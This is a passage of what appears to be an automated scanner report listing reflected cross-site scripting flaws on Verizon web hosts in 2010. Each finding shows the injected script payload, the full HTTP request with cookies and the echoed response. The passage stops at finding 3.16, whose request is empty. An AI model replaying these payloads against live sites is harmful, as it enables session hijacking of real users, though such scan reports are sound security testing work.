serviceType=ANY&fVZTState=&route=validateService&state=&serviceId=1ea0c'%3balert(1)//5fb68b88c27&securityCheck=validated&state=&select=serialCircuit&textfield=&textfield=&textfield=&textfield=&textfield=&textfield=&textfield=&textfield=&textfield=&textfield=&fState=&textfield=&textfield=&textfie
...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Date: Sat, 20 Nov 2010 02:16:05 GMT
Connection: keep-alive
Content-Length: 55599


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<li
...[SNIP]...
="hide";
       document.getElementById("linkShow").className="show";
       document.getElementById("linkHide").className="hide"
       
   }
   function ticketdata_func()
   {        
       ticket_data = 'Service_id: '+'1EA0C';ALERT(1)//5FB68B88C27';
       
       aims_setExtraCustomerInfo('EMTS_TICKET_INFO',ticket_data);
   }    

function MM_findObj(n, d) { //v4.01
var p,i,x;
if(!d)
d=document;
if((p=n.index
...[SNIP]...

3.6. https://enterprisecenter.verizon.com/enterprisesolutions/default/irepair/QuickTicketMainDispatch.do [serviceType parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://enterprisecenter.verizon.com
Path:   /enterprisesolutions/default/irepair/QuickTicketMainDispatch.do

Issue detail

The value of the serviceType request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 248ca"><img%20src%3da%20onerror%3dalert(1)>b84734f6a04 was submitted in the serviceType parameter. This input was echoed as 248ca"><img src=a onerror=alert(1)>b84734f6a04 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

POST /enterprisesolutions/default/irepair/QuickTicketMainDispatch.do?route=evaluateServiceId HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/default/irepair/QuickTicketIdentify.do
Cache-Control: max-age=0
Origin: https://enterprisecenter.verizon.com
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; VZGEO=west; vzAppID=; V347=CT-2; LOB_CATEGORY=; Product=A; ProductXML=A; vzpers=STATE=TX; vzapps=STATE=TX; ED_SESSIONID=KxTbMnyP2zr9LhVwBk93rzd6dKK0TBqL2ZNYgJg4qC0TFgJwDMP5!2085112158!-2093491878; pref_lang=en-US; CustTrackPage=GHP; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; CP=null*; BusinessUnit=business
Content-Length: 481

serviceType=ANY248ca"><img%20src%3da%20onerror%3dalert(1)>b84734f6a04&fVZTState=&route=validateService&state=&serviceId=%27&securityCheck=validated&state=&select=serialCircuit&textfield=&textfield=&textfield=&textfield=&textfield=&textfield=&textfield=&textfield=&textf
...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Date: Sat, 20 Nov 2010 02:14:12 GMT
Connection: keep-alive
Content-Length: 37554


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<li
...[SNIP]...
<input id = "savedServiceType" class="hide" value="ANY248ca"><img src=a onerror=alert(1)>b84734f6a04"/>
...[SNIP]...

3.7. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8b439"><script>alert(1)</script>14a07652aec was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net8b439"><script>alert(1)</script>14a07652aec/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 02:14:20 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 359
Content-Type: text/html
Cache-Control: private
Content-Length: 359

<A HREF="http://oascentral.verizononline.com/RealMedia/ads/click_lx.ads/vzsurround2.net8b439"><script>alert(1)</script>14a07652aec/homepage/708539588/Top/default/empty.gif/726e6f58326b7a6e4b45494141693565?x" target="_top">
...[SNIP]...

3.8. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ce74"><script>alert(1)</script>92b0fb76a8b was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage2ce74"><script>alert(1)</script>92b0fb76a8b/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 02:14:23 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1394
Content-Type: text/html
Cache-Control: private
Content-Length: 1394

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http://oascentral.verizononline.com/RealMedia/ads/click_lx.ads/vzsurround2.net/homepage2ce74"><script>alert(1)</script>92b0fb76a8b/L15/230690700/Top/VDSL/PlatformA_vzsur_728_2009-05/PlatformA_vzsur_728_2009-05_tracking/726e6f58326b7a6e4b45494141693565?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&po
...[SNIP]...

3.9. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53b64"><script>alert(1)</script>22bd36ebe57 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top53b64"><script>alert(1)</script>22bd36ebe57?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 02:14:26 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 352
Content-Type: text/html
Cache-Control: private
Content-Length: 352

<A HREF="http://oascentral.verizononline.com/RealMedia/ads/click_lx.ads/vzsurround2.net/homepage/1247056197/Top53b64"><script>alert(1)</script>22bd36ebe57/default/empty.gif/726e6f58326b7a6e4b45494141693565?x" target="_top">
...[SNIP]...

3.10. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [audio_conf parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top

Issue detail

The value of the audio_conf request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fbd15"><script>alert(1)</script>e9b1c6ac9bf was submitted in the audio_conf parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=fbd15"><script>alert(1)</script>e9b1c6ac9bf&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 02:13:48 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1394
Content-Type: text/html
Cache-Control: private
Content-Length: 1394

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=fbd15"><script>alert(1)</script>e9b1c6ac9bf&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

3.11. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [bbaw parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top

Issue detail

The value of the bbaw request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b04e9"><script>alert(1)</script>88b43b9e841 was submitted in the bbaw parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=b04e9"><script>alert(1)</script>88b43b9e841&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 02:13:58 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1394
Content-Type: text/html
Cache-Control: private
Content-Length: 1394

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=b04e9"><script>alert(1)</script>88b43b9e841&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

3.12. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [connex parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top

Issue detail

The value of the connex request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95f66"><script>alert(1)</script>944d611ec25 was submitted in the connex parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=95f66"><script>alert(1)</script>944d611ec25&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 02:13:08 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1394
Content-Type: text/html
Cache-Control: private
Content-Length: 1394

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
latformA_vzsur_728_2009-05/PlatformA_vzsur_728_2009-05_tracking/726e6f58326b7a6e4b45494141693565?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=95f66"><script>alert(1)</script>944d611ec25&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_
...[SNIP]...

3.13. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [fiostvown parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top

Issue detail

The value of the fiostvown request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dc55a"><script>alert(1)</script>061e019d33 was submitted in the fiostvown parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=dc55a"><script>alert(1)</script>061e019d33&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 02:13:17 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1392
Content-Type: text/html
Cache-Control: private
Content-Length: 1392

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
vzsur_728_2009-05_tracking/726e6f58326b7a6e4b45494141693565?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=dc55a"><script>alert(1)</script>061e019d33&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

3.14. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [fiosvoice parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top

Issue detail

The value of the fiosvoice request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 12655"><script>alert(1)</script>19403df38df was submitted in the fiosvoice parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=12655"><script>alert(1)</script>19403df38df&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 02:13:19 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1394
Content-Type: text/html
Cache-Control: private
Content-Length: 1394

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
009-05_tracking/726e6f58326b7a6e4b45494141693565?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=12655"><script>alert(1)</script>19403df38df&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

3.15. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [msp parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top

Issue detail

The value of the msp request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2d52"><script>alert(1)</script>08e01549957 was submitted in the msp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=c2d52"><script>alert(1)</script>08e01549957&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 02:13:28 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1394
Content-Type: text/html
Cache-Control: private
Content-Length: 1394

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
326b7a6e4b45494141693565?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=c2d52"><script>alert(1)</script>08e01549957&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

3.16. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 198e7"><script>alert(1)</script>2bc9a424ec6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

